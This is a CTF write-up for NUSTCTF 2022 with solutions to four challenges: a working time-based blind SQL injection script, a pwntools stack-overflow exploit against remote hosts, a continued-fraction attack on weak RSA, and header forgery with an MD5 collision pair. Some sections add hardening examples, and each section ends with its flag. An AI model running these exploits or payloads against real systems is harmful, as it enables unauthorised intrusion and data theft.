# NUSTCTF (Off-Campus Track) 2022 WP


    Challenge replay environment:
    https://www.ctfer.vip/contest/62/
    Join the QQ group to work on challenges together and share solution ideas: 936250507
    

    [Web]EzSQL

    http://47.103.60.98/
    

    The page offers a "Query" button. Clicking it opens the results page.

    http://47.103.60.98/index.php?sort=desc
    
    id: 2 - 姓名: Bob - 籍贯: 江苏无锡
    id: 4 - 姓名: Tom - 籍贯: 江苏常州
    id: 1 - 姓名: Alice - 籍贯: 江苏南京
    id: 5 - 姓名: Mary - 籍贯: 江苏南京
    id: 6 - 姓名: Allen - 籍贯: 江苏南京
    

    The URL ends in desc, so the backend is probably running a query of the form order by xx desc.

    Fuzzing SQL keywords shows that very few of them are filtered.

    Filtered: space
    

    Further testing shows a time-based blind SQL injection. The exp script:

    import requests

    burp0_url = "http://47.103.60.98/index.php?sort="
    burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0",
                     "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
                     "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
                     "Accept-Encoding": "gzip, deflate",
                     "Content-Type": "application/x-www-form-urlencoded",
                     }
    # Characters tried at each position; the backslash is escaped so the literal is valid
    all_print_str = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~"

    query_str = ''
    for length in range(1, 40):
        print(length, end='')
        for char in all_print_str:
            # Earlier stages used the same blind primitive for database(), table names and column names:
            # payload = "desc,if(ascii(mid(database(),{0},1))={1},sleep(1),0)#".format(length, ord(char))
            # payload = "desc,if(length((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/limit/**/0,1))=%s,sleep(3),1) --+" %l
            # payload = "desc,if(ascii(mid((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),{0},1))={1},sleep(1),0)#".format(length, ord(char))
            # payload = "desc,if(ascii(mid((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x706f736974696f6e),{0},1))={1},sleep(1),0)#".format(length, ord(char))
            # /**/ stands in for the space character, which is filtered
            payload = "desc,if(ascii(mid((select/**/group_concat(name,position)/**/from/**/position/**/where/**/id=3),{0},1))={1},sleep(1),0)#".format(length, ord(char))
            # burp0_data = {"username": "admin", "password": payload}
            resp = requests.get(burp0_url + payload, headers=burp0_headers)
            # print('{} : {} : {}'.format(length, char, resp.elapsed.total_seconds()))  # response time
            # A delayed response means the guessed character is correct; move on to the next position
            if resp.elapsed.total_seconds() > 1:
                query_str += char
                print(query_str)
                break
    # flag{f96cb1d47fa4022d1616b799367f078a3}
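    The injection works because the sort parameter is spliced straight into the ORDER BY clause. The following is an added example, not code from the original post or the challenge: a minimal sqlite3 reproduction of that sink next to a whitelisted version (the table and column names, and the sample rows, are assumptions). Since the fix never lets the untrusted value reach the SQL text, the space filter the challenge relied on becomes irrelevant.

```python
import sqlite3

# Constructed sample data mirroring the challenge's result page (assumed schema).
ROWS = [
    (1, "Alice", "Nanjing"),
    (2, "Bob", "Wuxi"),
    (4, "Tom", "Changzhou"),
    (5, "Mary", "Nanjing"),
    (6, "Allen", "Nanjing"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE position (id INTEGER, name TEXT, position TEXT)")
    conn.executemany("INSERT INTO position VALUES (?, ?, ?)", ROWS)
    return conn


def query_vulnerable(conn, sort):
    # The sort direction is concatenated into the statement, so anything after
    # the direction keyword becomes part of the SQL the database executes.
    sql = "SELECT id, name, position FROM position ORDER BY id " + sort
    return conn.execute(sql).fetchall()


ALLOWED_SORT = {"asc": "ASC", "desc": "DESC"}


def query_hardened(conn, sort):
    # An ORDER BY direction cannot be a bound parameter, so map the untrusted
    # value onto a fixed set of literals and refuse everything else.
    try:
        direction = ALLOWED_SORT[sort.lower()]
    except (KeyError, AttributeError):
        raise ValueError("invalid sort value: %r" % (sort,))
    sql = "SELECT id, name, position FROM position ORDER BY id " + direction
    return conn.execute(sql).fetchall()


def demo():
    conn = make_db()
    # A value that is not a bare direction still changes the executed query:
    # here it truncates the result set, which proves the parameter reaches SQL.
    tampered = "desc LIMIT 1"
    vuln_rows = query_vulnerable(conn, tampered)
    try:
        query_hardened(conn, tampered)
        hardened_rejected = False
    except ValueError:
        hardened_rejected = True
    return {
        "vulnerable_row_count": len(vuln_rows),
        "hardened_rejected": hardened_rejected,
        "hardened_desc_first_id": query_hardened(conn, "desc")[0][0],
    }


if __name__ == "__main__":
    print(demo())
```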
    

    [PWN]ezPwn

    64-bit binary. Start by decompiling it in IDA:

    int __cdecl main(int argc, const char **argv, const char **envp)
    {
      char v4[10]; // [rsp+6h] [rbp-Ah] BYREF
    
      setbuf(_bss_start, 0LL);
      puts("Your name plz:");
      gets(v4);
      if ( v4[0] % 233 == 233 )
        system("cat flag");
      printf("Can you hack me? %s\n", v4);
      return 0;
    }
    

    gets has no length limit, so the stack overflows. The comparison v4[0] % 233 == 233 can never be true (a char reduced mod 233 is always smaller than 233), so the way to reach system("cat flag") is to overwrite the return address with the address of that call: ret2text.

    exp:

    from pwn import *

    context.log_level = 'debug'
    io = remote("43.143.7.97", 28859)
    # Address of the system("cat flag") call inside main
    sys_addr = 0x401229
    # v4 sits at rbp-0xA: 10 bytes of buffer plus 8 bytes of saved rbp, then the return address
    pl1 = b'A'*(10+8) + p64(sys_addr)
    io.sendlineafter(b"Your name plz:",pl1)
    io.interactive()
    

    [Crypto] ezRSA

    chall.py

    from Crypto.Util.number import getPrime, bytes_to_long
    from sympy import nextprime
    from secret import flag
    
    p1 = getPrime(2048)
    q1 = getPrime(600)
    p2 = nextprime(p1 + getPrime(600))
    q2 = getPrime(600)
    
    e = 0x10001
    
    N1 = p1 * p1 * q1
    N2 = p2 * p2 * q2
    
    print("N1 =", N1)
    print("N2 =", N2)
    
    flag1 = bytes_to_long(flag[:len(flag) // 2])
    flag2 = bytes_to_long(flag[len(flag) // 2:])
    
    cipher1 = pow(flag1, e, N1)
    cipher2 = pow(flag2, e, N2)
    
    print("cipher1 =", cipher1)
    print("cipher2 =", cipher2)
    
    # N1 = 3289746385054724131365721020639496300945479666755005407239362220435929471663971559131973068094267242759747682915202602265269024546168034070348080432976135403371083936361236868186476392365554734516698695915807318328547349333450125215426536032220967810893464208090339137598724593917266763998037725309967496052803477931961681761135080900299333158097292389350335121611775110493009954911832572636099153354952171029044016319029661601727739828271424563980850243898202779669776639104067478441675153857040164775196713586656673764171877161326751846236980454659960530174960321852298270258312146241360929350418220172331956030775384681767932014061291168620965347842124549316096247113770711834360498936747471888481237404034471246978342020816271785925362208839937490625070051801028223342083281773366267363149243726101075926327550718757413133631119649782144511080448476370411156544146278468602957599519708203511203435394861053372096309444985117323976240925612725880016576029876493825989064619463226166401883310383733295274652092903872304933657343307118616812213637906513530016004460475073291823916649597185291734261926576108675712303422832460766980003743958182130150811173621769221262799069912858162405156365709344847558244669016188305691537672753134766406649385330682157984720023661279153645005631349488537261911860571171672813544726579872640486753312665928030263533489558821140031095492111373847722540582741061909831250761476687
    # N2 = 2292263744571677490370198515319050673022350367021940229132415885393214523108231545410288799524823682686607005535541881885794949322622162858593875970155712564868530006799557973311000615581843236548539733075504282834631939435260232339940338468890310925405870533590386398071667718507612723307978025099102004513584485422609923041107028535400446355591432930994813185411831860201820145983435091523773691560011687528125877698679841462745728326159525372061320952493949821495222248383893254880735838359120880431072244214361010867779059178282739912365087421904643477215607290679708352033106358356290644004853543174075195107627794359272018100648168661860452919746052205404895413998960327066611970768862624073581670828267510841602161728589913841163473811894218339948715205301321356774629578043062238684103507006315521103670400509643518854842374093509082331379305822049420033746124157212615698602544129110388591266923967512746018551734391176602223771675279723873630468099034521371667295520830509224068753383327420799595674898227670628881521095495898465890256628288779785408613688721508315026743250146090703141554141208186588758560579281631449476819201739513661261100456398775274335050320480934180632543242116316388750179657345282978014879818574111951053767465935985181195234991374892341383106554664200986728169474150302232887629401491764905429656980077385228539526682528035467486946883267941678859904770170914569949948781798383
    # cipher1 = 758346536265430423952822486066685295768780904671958564513706915003627653309986327906604310025557676880130150973194443591153899441660221125085406078577489990064034099758898680250346992154199616929381594288918352701155172644054184374384778201304104144436102359709180739955762513436889301607686277088230852661148556440251553059814853050711377102806879036793210874472411397851504602916797481132018776755416068149801594219844674499351889997208649442043923826505239289470153001663639688739092310857881616013610569511757767780350165048282465256454770748877584119349207769812826840607665168961680724232789109312681055375411182858820698025923104994832566402422884359019460479145829812817446509615552819113705033128233093081687704471007797878802184788802106948491309583791881593217988561342681568377126606055476508381741342859362339824940846336741346126512500348868154174463810299929429409815515908136711497765026252563374327541491024303290989175383501994515761077240391195396083766760326143468930305986070405962303571534654392917816088220966950447926277802817335097304148972911332832248113849846752219065263639980629213197260594242031101803801865240157341309018859709063723920616432168289755151080828619642932516426139982777613526680161145782566883722320235485389839997229666979487071672091138823743231576011381309205283462045931376953038071401274899229258796970036565931730655471667545203734032609058125128632555918726761
    # cipher2 = 2281163375114595112593683220870779643793045914138930809669934728297504812745368657964524831965320392164027435706363680996214578180045485041532876049868691323690200562004954003143194397255512951717400899604307009993030792644670830602941543918898535970779253703220162651022293286208338299826844988619345629892007235258389532666376623514170628541968337364745860334903754371727427376399211310359996960626733244649671665175464666807399652951289553389561033148215888827057495743582318390507639029065358587166019110069479019692411629179363742708597061223484237748437654542910240974030049076975739481960903748359283570086571360417832776823264202688497555419017227144724790205424467059280453940666789219388347170532415234759731375390229140544207931837445265744016932142504371200121886182154284965893665022781184321216382767703694597553489507371271887593799060901908513758134472760311502510753557029741715193386673389466599068008750012915225818076301655694045130332321314233483042503950958442501013310465239137942770667655164906193219286435485452257047415797293472629254376873962168035382262951696816840667369861437088409243033239980128747965838367176274122593955221422537124546203553941387134587884149412499272660959871746858550851448840531698152805786123875121854564754397297726121984646669253047201515221545545683432754661774694401343486893270795112334494874407955432598253951220055000392855162417030953645428808146502304
    
    

    Use continued fractions to recover q1 and q2; p1 and p2 then follow.

    from Crypto.Util.number import *
    from gmpy2 import *
    
    N1 = 3289746385054724131365721020639496300945479666755005407239362220435929471663971559131973068094267242759747682915202602265269024546168034070348080432976135403371083936361236868186476392365554734516698695915807318328547349333450125215426536032220967810893464208090339137598724593917266763998037725309967496052803477931961681761135080900299333158097292389350335121611775110493009954911832572636099153354952171029044016319029661601727739828271424563980850243898202779669776639104067478441675153857040164775196713586656673764171877161326751846236980454659960530174960321852298270258312146241360929350418220172331956030775384681767932014061291168620965347842124549316096247113770711834360498936747471888481237404034471246978342020816271785925362208839937490625070051801028223342083281773366267363149243726101075926327550718757413133631119649782144511080448476370411156544146278468602957599519708203511203435394861053372096309444985117323976240925612725880016576029876493825989064619463226166401883310383733295274652092903872304933657343307118616812213637906513530016004460475073291823916649597185291734261926576108675712303422832460766980003743958182130150811173621769221262799069912858162405156365709344847558244669016188305691537672753134766406649385330682157984720023661279153645005631349488537261911860571171672813544726579872640486753312665928030263533489558821140031095492111373847722540582741061909831250761476687
    N2 = 2292263744571677490370198515319050673022350367021940229132415885393214523108231545410288799524823682686607005535541881885794949322622162858593875970155712564868530006799557973311000615581843236548539733075504282834631939435260232339940338468890310925405870533590386398071667718507612723307978025099102004513584485422609923041107028535400446355591432930994813185411831860201820145983435091523773691560011687528125877698679841462745728326159525372061320952493949821495222248383893254880735838359120880431072244214361010867779059178282739912365087421904643477215607290679708352033106358356290644004853543174075195107627794359272018100648168661860452919746052205404895413998960327066611970768862624073581670828267510841602161728589913841163473811894218339948715205301321356774629578043062238684103507006315521103670400509643518854842374093509082331379305822049420033746124157212615698602544129110388591266923967512746018551734391176602223771675279723873630468099034521371667295520830509224068753383327420799595674898227670628881521095495898465890256628288779785408613688721508315026743250146090703141554141208186588758560579281631449476819201739513661261100456398775274335050320480934180632543242116316388750179657345282978014879818574111951053767465935985181195234991374892341383106554664200986728169474150302232887629401491764905429656980077385228539526682528035467486946883267941678859904770170914569949948781798383
    c1 = 758346536265430423952822486066685295768780904671958564513706915003627653309986327906604310025557676880130150973194443591153899441660221125085406078577489990064034099758898680250346992154199616929381594288918352701155172644054184374384778201304104144436102359709180739955762513436889301607686277088230852661148556440251553059814853050711377102806879036793210874472411397851504602916797481132018776755416068149801594219844674499351889997208649442043923826505239289470153001663639688739092310857881616013610569511757767780350165048282465256454770748877584119349207769812826840607665168961680724232789109312681055375411182858820698025923104994832566402422884359019460479145829812817446509615552819113705033128233093081687704471007797878802184788802106948491309583791881593217988561342681568377126606055476508381741342859362339824940846336741346126512500348868154174463810299929429409815515908136711497765026252563374327541491024303290989175383501994515761077240391195396083766760326143468930305986070405962303571534654392917816088220966950447926277802817335097304148972911332832248113849846752219065263639980629213197260594242031101803801865240157341309018859709063723920616432168289755151080828619642932516426139982777613526680161145782566883722320235485389839997229666979487071672091138823743231576011381309205283462045931376953038071401274899229258796970036565931730655471667545203734032609058125128632555918726761
    c2 = 2281163375114595112593683220870779643793045914138930809669934728297504812745368657964524831965320392164027435706363680996214578180045485041532876049868691323690200562004954003143194397255512951717400899604307009993030792644670830602941543918898535970779253703220162651022293286208338299826844988619345629892007235258389532666376623514170628541968337364745860334903754371727427376399211310359996960626733244649671665175464666807399652951289553389561033148215888827057495743582318390507639029065358587166019110069479019692411629179363742708597061223484237748437654542910240974030049076975739481960903748359283570086571360417832776823264202688497555419017227144724790205424467059280453940666789219388347170532415234759731375390229140544207931837445265744016932142504371200121886182154284965893665022781184321216382767703694597553489507371271887593799060901908513758134472760311502510753557029741715193386673389466599068008750012915225818076301655694045130332321314233483042503950958442501013310465239137942770667655164906193219286435485452257047415797293472629254376873962168035382262951696816840667369861437088409243033239980128747965838367176274122593955221422537124546203553941387134587884149412499272660959871746858550851448840531698152805786123875121854564754397297726121984646669253047201515221545545683432754661774694401343486893270795112334494874407955432598253951220055000392855162417030953645428808146502304
    e = 0x10001
    
    def continuedFra(x, y):
        # Partial quotients of the continued fraction expansion of x/y
        cF = []
        while y:
            cF += [x // y]
            x, y = y, x % y
        return cF

    def Simplify(ctnf):
        # Evaluate a list of partial quotients back to a fraction. Note the
        # order of the returned pair: it is (denominator, numerator) of the convergent.
        numerator = 0
        denominator = 1
        for x in ctnf[::-1]:
            numerator, denominator = denominator, x * denominator + numerator
        return (numerator, denominator)

    def getit(c):
        # All convergents of the continued fraction c
        cf=[]
        for i in range(1,len(c)):
            cf.append(Simplify(c[:i]))
        return cf

    def wienerAttack(n1, n2):
        # N1/N2 = (q1/q2) * (p1/p2)^2 and p1/p2 is extremely close to 1 (p2 - p1 is
        # only ~600 bits against 2048-bit p1), so q1/q2 appears as a convergent
        # of N1/N2, the same idea as Wiener's attack.
        cf=continuedFra(n1,n2)
        for (den, num) in getit(cf):
            if num == 0:
                continue
            if n1%num==0 and num!=1:
                return num,den
    q1,q2 = wienerAttack(N1,N2)
    print(isPrime(q1))
    print(isPrime(q2))
    print(q1,q2)
    print(q1.bit_length())
    print(q2.bit_length())
    # N = p^2 * q, so p is the exact square root of N // q
    p1,f = iroot(N1//q1, 2)
    p2,f = iroot(N2//q2, 2)
    print(isPrime(p1))
    print(isPrime(p2))
    # phi(p^2 * q) = p * (p-1) * (q-1)
    d1 = inverse(e, p1*(p1-1)*(q1-1))
    d2 = inverse(e, p2*(p2-1)*(q2-1))
    m1 = pow(c1, d1, N1)
    m2 = pow(c2, d2, N2)
    print(long_to_bytes(m1).decode(), end='')
    print(long_to_bytes(m2).decode())
    # flag{6575266e9fc6411275185799ec9477ee}
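    Why the convergent search works: N1/N2 = (q1/q2) * (p1/p2)^2, and because p2 - p1 is only about 600 bits against a 2048-bit p1, the factor (p1/p2)^2 is within roughly 2^-1447 of 1. That is far below the 1/(2*q2^2) > 2^-1201 bound of Legendre's theorem (q2 is 600 bits), so q1/q2 must occur among the convergents of N1/N2. The following is an added example, my own code rather than the original solve script: it rebuilds the same key structure at toy size with pure-stdlib primes, runs the convergent search, and checks that the recovered factors decrypt. The bit sizes, seed and plaintext are arbitrary choices, and the primality test is a plain Miller-Rabin rather than the Crypto/sympy routines chall.py uses.

```python
import math
import random

E = 0x10001


def is_probable_prime(n, rng, rounds=24):
    # Miller-Rabin with random bases; adequate for a toy instance.
    if n < 2:
        return False
    for sp in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % sp == 0:
            return n == sp
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        a = rng.randrange(2, n - 1)
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def usable_prime(n, rng):
    # gcd(e, n-1) == 1 keeps e invertible modulo phi(N).
    return is_probable_prime(n, rng) and (n - 1) % E != 0


def gen_prime(bits, rng):
    while True:
        n = rng.getrandbits(bits) | (1 << (bits - 1)) | 1
        if usable_prime(n, rng):
            return n


def next_prime(n, rng):
    n += 1 + (n % 2)            # step to the next odd number above n
    while not usable_prime(n, rng):
        n += 2
    return n


def build_toy_instance(seed, p_bits=256, q_bits=64):
    # Same shape as chall.py: N = p^2 * q, p2 = nextprime(p1 + offset), at toy sizes.
    rng = random.Random(seed)
    p1 = gen_prime(p_bits, rng)
    q1 = gen_prime(q_bits, rng)
    p2 = next_prime(p1 + gen_prime(q_bits, rng), rng)
    q2 = gen_prime(q_bits, rng)
    while q2 == q1:
        q2 = gen_prime(q_bits, rng)
    return {"p1": p1, "q1": q1, "p2": p2, "q2": q2,
            "N1": p1 * p1 * q1, "N2": p2 * p2 * q2}


def convergents(x, y):
    # Successive convergents h/k of the continued fraction of x/y, in lowest terms.
    h0, h1 = 0, 1
    k0, k1 = 1, 0
    while y:
        a, x, y = x // y, y, x % y
        h0, h1 = h1, a * h1 + h0
        k0, k1 = k1, a * k1 + k0
        yield h1, k1


def recover_factors(N1, N2):
    # q1/q2 is a convergent of N1/N2. A candidate is confirmed when both
    # cofactors N/q are perfect squares, which also yields p1 and p2 exactly.
    for h, k in convergents(N1, N2):
        if h <= 1 or N1 % h or N2 % k:
            continue
        p1 = math.isqrt(N1 // h)
        p2 = math.isqrt(N2 // k)
        if p1 * p1 == N1 // h and p2 * p2 == N2 // k:
            return p1, h, p2, k
    return None


def decrypt(c, p, q, N):
    # phi(p^2 * q) = p * (p-1) * (q-1), as in the solve script above
    d = pow(E, -1, p * (p - 1) * (q - 1))
    return pow(c, d, N)


def demo(seed=2022):
    inst = build_toy_instance(seed)
    p1, q1, p2, q2 = recover_factors(inst["N1"], inst["N2"])
    m = 0x6d73675f74657374          # constructed plaintext, well below N1
    c = pow(m, E, inst["N1"])
    return {
        "factors_ok": (p1, q1, p2, q2) == (inst["p1"], inst["q1"], inst["p2"], inst["q2"]),
        "decrypt_ok": decrypt(c, p1, q1, inst["N1"]) == m,
    }


if __name__ == "__main__":
    print(demo())
```

    The same size ratio as the challenge holds here (p is four times the width of q, and the gap p2 - p1 is q-sized), so the error term 2*(p2-p1)/p1 is about 2^-190 against a Legendre bound of 2^-129; shrinking the gap or growing q past that bound is where the convergent search stops finding q1/q2.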
    

    [Web] ezProtocol

    Let's test your web fundamentals.

    This challenge checks HTTP protocol knowledge. Send requests with Yakit's Web Fuzzer:

    GET / HTTP/1.1
    Host: 43.143.7.97:28086
    
    
    -->
    You must come from 127.0.0.1
    

    Add an XFF header:

    GET / HTTP/1.1
    Host: 43.143.7.97:28086
    X-Forwarded-For: 127.0.0.1
    
    -->
    Have you just visited http://localhost/?
    

    Add a Referer as well:

    GET / HTTP/1.1
    Host: 43.143.7.97:28086
    X-Forwarded-For: 127.0.0.1
    Referer: http://localhost/
    
    -->
    You must use POST
    

    Change the method from GET to POST:

    --> Your posted username must be admin
    

    Then add the POST data:

    POST / HTTP/1.1
    Host: 43.143.7.97:28086
    X-Forwarded-For: 127.0.0.1
    Referer: http://localhost/
    Content-Type: application/x-www-form-urlencoded
    
    username=admin
    
    --> Your posted p1 and p2 must be different but have the same md5
    

    Bypass with an MD5 collision: two different byte strings with the same MD5 digest.

    POST / HTTP/1.1
    Host: 43.143.7.97:28086
    X-Forwarded-For: 127.0.0.1
    Referer: http://localhost/
    Content-Type: application/x-www-form-urlencoded
    
    username=admin&p1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&p2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2
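    The check "p1 and p2 must be different but have the same md5" is exactly the property an MD5 collision defeats. As an added check, not part of the original post, the script below URL-decodes the two form values sent above, confirms they are distinct byte strings with an identical MD5, and shows that the same server-side rule implemented with SHA-256 rejects the pair. The two encoded strings are copied from the request; the function names are my own.

```python
import hashlib
from urllib.parse import unquote_to_bytes

# The two percent-encoded form values from the request above.
P1_ENCODED = ("M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B"
              "%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2")
P2_ENCODED = ("M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B"
              "%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2")


def decode_form_value(value):
    # application/x-www-form-urlencoded: '+' is a space, then percent-decode to raw bytes.
    return unquote_to_bytes(value.replace("+", " "))


def same_hash(a, b, algorithm):
    return hashlib.new(algorithm, a).digest() == hashlib.new(algorithm, b).digest()


def server_check_md5(p1, p2):
    # The challenge's condition: different values, equal MD5.
    return p1 != p2 and same_hash(p1, p2, "md5")


def server_check_sha256(p1, p2):
    # Same rule with SHA-256, for which no collision is known; an attacker
    # cannot supply a distinct pair that satisfies it.
    return p1 != p2 and same_hash(p1, p2, "sha256")


def analyse():
    p1 = decode_form_value(P1_ENCODED)
    p2 = decode_form_value(P2_ENCODED)
    # Byte positions where the two 64-byte blocks differ
    differing = [i for i, (x, y) in enumerate(zip(p1, p2)) if x != y]
    return {
        "length": len(p1),
        "differing_offsets": differing,
        "md5_check_passes": server_check_md5(p1, p2),
        "sha256_check_passes": server_check_sha256(p1, p2),
    }


if __name__ == "__main__":
    print(analyse())
```

    The pair is a single 64-byte MD5 block differing in two bytes; any equality test built on MD5 (including PHP's md5() comparisons this challenge imitates) accepts it, whereas a SHA-256 based comparison does not.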
    

    -->

    Set-Cookie: dinner=diet%20menu
    
    I don' want to follow diet menu anymore, I want to have a big meal
    

    Add the Cookie:

    POST / HTTP/1.1
    Host: 43.143.7.97:28086
    X-Forwarded-For: 127.0.0.1
    Referer: http://localhost/
    Content-Type: application/x-www-form-urlencoded
    Cookie: dinner=big%20meal
    
    username=admin&p1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&p2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2
    
    -->
    Oh, I'm satisfied, and this is your flag: NSSCTF{b62ea40a-37de-4437-b7d3-5da72bf44b00}
    
    Original post: https://blog.csdn.net/rickliuxiao/article/details/127826580